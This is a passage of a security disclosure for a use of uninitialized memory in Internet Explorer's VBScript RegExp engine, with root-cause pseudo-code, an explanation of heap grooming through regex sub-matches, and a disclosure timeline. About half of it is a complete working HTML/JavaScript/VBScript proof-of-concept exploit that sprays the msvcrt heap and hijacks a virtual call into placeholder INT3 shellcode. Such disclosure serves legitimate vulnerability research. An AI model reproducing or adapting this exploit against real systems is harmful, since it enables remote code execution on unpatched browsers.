||||
1C 04 DWORD poUnknownObject_1C
|
||||
20 04 DWORD dwUnknown_20
|
||||
24 04 BSTR sValue
|
||||
28 04 INT[]* paiMatchStartAndEndIndices
|
||||
2C 04 INT iCountMatchAndSubMatches
|
||||
} // size = 0x30 (x86) or unknown (x64)
|
||||
When an error occurs in this part of the code, the error handling code will try to clean up and free all CMatchBlock structures created before the error occurred. To do this, it walks the linked list of CMatchBlock structures and for each structure, release each CMatch object in the structure. All CMatchBlock structures except the last one should have 16 such pointers, the last CMatchBlock structure can have 1-16, depending on how many matches where found in total. This appears to have been designed to count how many CMatch objects it has yet to free. This counter is initialized to the number of matches found before the error occurred and should be decremented whenever the code frees a CMatch object, so the code can determine how many CMatch object are in the last CMatchBlock structure. However, this code neglects to decrement this counter. This causes the code to assume all CMatchBlock structures have 16 CMatch object pointers if there were more than 16 matches in total, and attempt to release 16 CMatch objects from the last CMatchBlock structure, even if less than 16 pointers to CMatch objects were stored there.
|
||||
|
||||
The below pseudo-code represents how the real code works:
|
||||
|
||||
poCMatchBlock = poFirstCMatchBlock;
|
||||
do {
|
||||
if (iTotalMatchesCount < 0x10) { // Note 1
|
||||
iMatchesInCMatchBlock = iTotalMatchesCount;
|
||||
} else {
|
||||
iMatchesInCMatchBlock = 0x10; // Note 2
|
||||
}
|
||||
for (iIndex = 0; iIndex < iMatchesInCMatchBlock; iIndex++) {
|
||||
poCMatchBlock->apoCMatches[iIndex].Release(); // Note 3
|
||||
}
|
||||
poOldCMatchBlock = poCMatchBlock;
|
||||
poCMatchBlock = poCMatchBlock->poNextCMatchBlock;
|
||||
delete poOldCMatchBlock;
|
||||
// Note 4
|
||||
} while (poCMatchBlock);
|
||||
|
||||
For example: if the code finds 17 matches before an error is triggered, 2 CMatchBlock structures will have been created: the first will contain 16 pointers to CMatch objects and the second will contain exactly 1. The error handling code will run with iTotalMatchesCount set to 17 but never decrements it (Note 4 shows where that decrement should happen). The loop is executed twice, once for each CMatchBlock structure. On each do...while-loop iTotalMatchesCount will be larger than 17 (Note 1) and thus iMatchesInCMatchBlock will be set to 16 (Note 2). This causes the for-loop to try to free 16 CMatch objects from the second CMatchBlock structure, in which only one was stored. This results in the code using uninitialized memory as a pointer to an object on which it attempts to call the Release method.
|
||||
|
||||
To fix this, the following code would have to be inserted at Note 4:
|
||||
|
||||
iTotalMatchesCount -= iMatchesInCMatchBlock
|
||||
|
||||
Exploitation
|
||||
|
||||
An attacker looking to exploit this bug will commonly attempt to allocate memory blocks of the same size and on the same heap as the CMatchBlock structure and fill these blocks with certain data before releasing them. If done correctly, the heap manager will then reuse these memory blocks when the CMatchBlock objects are allocated, causing these structures to contain the attacker supplied data. Once the vulnerability is triggered, this attacker supplied data is then used as pointers to CMatch objects, and when the code attempts to call the Release method of these objects, they are treated as pointers to a list of virtual function tables, from which the code retreives an address to call to execute that method. Control over these pointers therefore gives an attacker control over execution flow.
|
||||
|
||||
Heap Feng-Shui, a common technique used to manipulate the heap in MSIE, can not be used in this case, as it uses strings to manipulate the heap. Strings in both JavaScript and VBScript are allocated through OLEAUT32, whereas the CMatchBlock structures are allocated through msvcrt, which uses a different heap. The Trident rendering engine also uses a different heap to allocate various potentially useful memory blocks.
|
||||
|
||||
To find out if there was a way to allocate and free memory in order to manipulate the heap an control what the uninitialized memory contains, I logged all allocations made while executing the CRegExp::Execute method. This showed that it allocates a block of memory through msvcrt to store the indices of the start and end of a match and each of its sub-matches. The size of this block depends on the number of sub-matches in the regular expression and the contents of the block depends on where the matches are found in the string. Both are attacker controlled, allowing for the creation of memory blocks of near arbitrary size and content.
|
||||
|
||||
To exploit the bug, one can execute a regular expression that generates the desired sub-matches and free them in order to manipulate the heap before executing another regular expression that triggers the issue. This should cause the code to use attacker supplied values for the uninitialized CMatch object pointers. The Proof-of-Concept exploit below attempts to do this and execute memory under an attacker's control. As this is a simple PoC sploit, nothing is done in order to attempt to bypass mitigations such as [DEP] and the "shellcode" is simply a bunch of INT3-s.
|
||||
|
||||
Time-line
|
||||
|
||||
March 2014: This vulnerability was found through fuzzing.
|
||||
March/April 2014: This vulnerability was submitted to ZDI and iDefense.
|
||||
May 2014: The vulnerability was acquired by iDefense.
|
||||
June 2014: The vulnerability was reported to Microsoft by iDefense.
|
||||
December 2014: The vulnerability was address by Microsoft in MS14-080 and MS14-084.
|
||||
November 2016: Details of this issue are released.
|
||||
-->
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=10">
|
||||
<script language="JavaScript">
|
||||
function createRepeatedString(uSize, sString) {
|
||||
var sRepeatedString = "";
|
||||
var uLeftMostBit = 1 << (Math.ceil(Math.log(uSize+1) / Math.log(2)) - 1);
|
||||
for (var uBit = uLeftMostBit; uBit > 0; uBit = uBit >>> 1) {
|
||||
sRepeatedString += sRepeatedString;
|
||||
if (uSize & uBit) sRepeatedString += sString;
|
||||
}
|
||||
return sRepeatedString;
|
||||
}
|
||||
function createDWordString(uValue) {
|
||||
return String.fromCharCode(uValue & 0xFFFF, uValue >>> 16);
|
||||
}
|
||||
function createChunkWithDWords(uChunkSize, uValue) {
|
||||
return createRepeatedString(uChunkSize / 4, createDWordString(uValue));
|
||||
}
|
||||
function setChunkDWord(sChunk, uOffset, uValue) {
|
||||
if (uOffset & 1) throw new Error("uOffset (" + uOffset.toString(16) + ") must be Word aligned");
|
||||
var uIndex = (uOffset % (sChunk.length * 2)) / 2;
|
||||
return sChunk.substr(0, uIndex) + createDWordString(uValue) + sChunk.substr(uIndex + 2);
|
||||
}
|
||||
window.onload = function() {
|
||||
// CRegExp::Execute can be made to use an uninitialized pointer to a CMatch object to call a virtual method of
|
||||
// that object. In order to exploit this vulnerability, the exploit will try to prepare the heap such that the
|
||||
// uninitialized pointer will contain a value under the exploit's control, allowing the exploit to control
|
||||
// what gets execution.
|
||||
// The uninitialized pointer is taken from a memory block containing 0x11 pointers (0x44 bytes on x86).
|
||||
var uBlockSize = 0x44;
|
||||
// This block is allocated on a heap used by msvcrt, so the exploit will allocate blocks of memory of the same
|
||||
// size on the same heap, fill them with certain values and free them in order to prepare the heap. Commonly used
|
||||
// ways of spraying the heap allocate memory blocks on another heap and are therefore not useful in this context.
|
||||
// When a regular expression is executed and matches are found, a block of memory is allocated through msvcrt
|
||||
// for each match. Each block will be used to store the start and end offset of the match in two DWords, as well
|
||||
// as the start and end offset of each sub-match, also in two DWords (this is true for x86 and x64). Therefore,
|
||||
// changing the number of sub-matches allows control over the size of the block, and changing the offset of the
|
||||
// matches allows control over the values stored in the block. In short, the size of the block will be 8 bytes
|
||||
// plus 8 bytes for each "()" in the expression. Since all blocks are rounded up to a multiple of 8 bytes, this
|
||||
// can be used to allocate and fill blocks of the same size as the block that will contain the uninitialized
|
||||
// pointer later.
|
||||
// Successive matches will be at successive offsets, so the values stored in each allocated block will be
|
||||
// increment by the length of the match. If the size of each match is 4 bytes, the value will increase by 4 in
|
||||
// each successive block. For addresses pointing to a heap spray, this is acceptible.
|
||||
var sMatchMarker = "PWND"; // This will be where the expression matches
|
||||
var uRequiredSubMatches = Math.floor((uBlockSize + 7) / 8) - 1;
|
||||
var sPattern = createRepeatedString(uRequiredSubMatches, "()") + sMatchMarker;
|
||||
// The pattern will match at the marker, so a string with the same number of markers as the desired number of
|
||||
// match objects will created that many match objects on the heap.
|
||||
var uMatchCount = 0x8001; // More is better :)
|
||||
var sMatchesBuffer = createRepeatedString(uMatchCount, sMatchMarker);
|
||||
// The memory blocks that the exploit will create will be filled with offsets of matches. To put the value X in a
|
||||
// block, a match must be made after X characters. The exploit will need to fill the block with pointers to memory
|
||||
// under its control, so the values it uses will be in the usual range for a heap spray. The values cannot be too
|
||||
// large, as the string needed to create them would become so large that OOMs are likely to kill the exploit.
|
||||
var uTargetAddress = 0x0a0a0000; // String needed to create this value will be twice as large!
|
||||
var uVFTableOffset = 0x8000;
|
||||
var uShellcodeOffset = 0x9000;
|
||||
// Now spray the heap is to allocate memory at the target address.
|
||||
var uChunkSize = 0x10000;
|
||||
// Create a chunk with pointers to a fake vftable, a fake vftable and shellcode.
|
||||
var sChunk = createChunkWithDWords(uChunkSize, uTargetAddress + uVFTableOffset);
|
||||
// The fake vftable in the chunk should have a pointer for ::Release that points to our shellcode (no ROP
|
||||
// or anything fancy: this is a PoC).
|
||||
sChunk = setChunkDWord(sChunk, uTargetAddress + uVFTableOffset + 8, uTargetAddress + uShellcodeOffset);
|
||||
// The shellcode is just a bunch of INT3s (again; this is a PoC sploit).
|
||||
sChunk = setChunkDWord(sChunk, uTargetAddress + uShellcodeOffset, 0xCCCCCCCC);
|
||||
var uChunkCount = uTargetAddress / uChunkSize * 2;
|
||||
var uHeapHeaderSize = 0x10;
|
||||
var uHeapFooterSize = 0x04;
|
||||
var sBuffer = (
|
||||
sChunk.substr(uHeapHeaderSize / 2) + // Align chunk content with page boundary
|
||||
createRepeatedString(uChunkCount - 2, sChunk) +
|
||||
sChunk.substr(0, uHeapHeaderSize / 2) + // Allign matches with target address
|
||||
sMatchesBuffer
|
||||
);
|
||||
// The regular expression is executed on the buffer to create "uBlockCount" blocks of "uBlockSize" bytes filled
|
||||
// with dwords containing "uTargetAddress+N*4", where N is the number of the individual matches.
|
||||
// We'll do this a number of times
|
||||
sprayMSVCRTHeapAndTriggerVuln(sPattern, sBuffer);
|
||||
}
|
||||
</script>
|
||||
<script language="VBScript">
|
||||
Set oRegExp = New RegExp
|
||||
oRegExp.Global = True
|
||||
Sub sprayMSVCRTHeapAndTriggerVuln(sPattern, sBuffer)
|
||||
' Spray MSVCRT heap
|
||||
oRegExp.Pattern = sPattern
|
||||
oRegExp.Execute(sBuffer)
|
||||
' 17 matches are needed before an error (caused by an OOM) to trigger the vulnerable cleanup path.
|
||||
oRegExp.Pattern = "A|()*?$"
|
||||
oRegExp.Execute(String(17, "A") & "x")
|
||||
End Sub
|
||||
</script>
|
||||
</head>
|
||||
</html>
|
Loading…
Add table
Reference in a new issue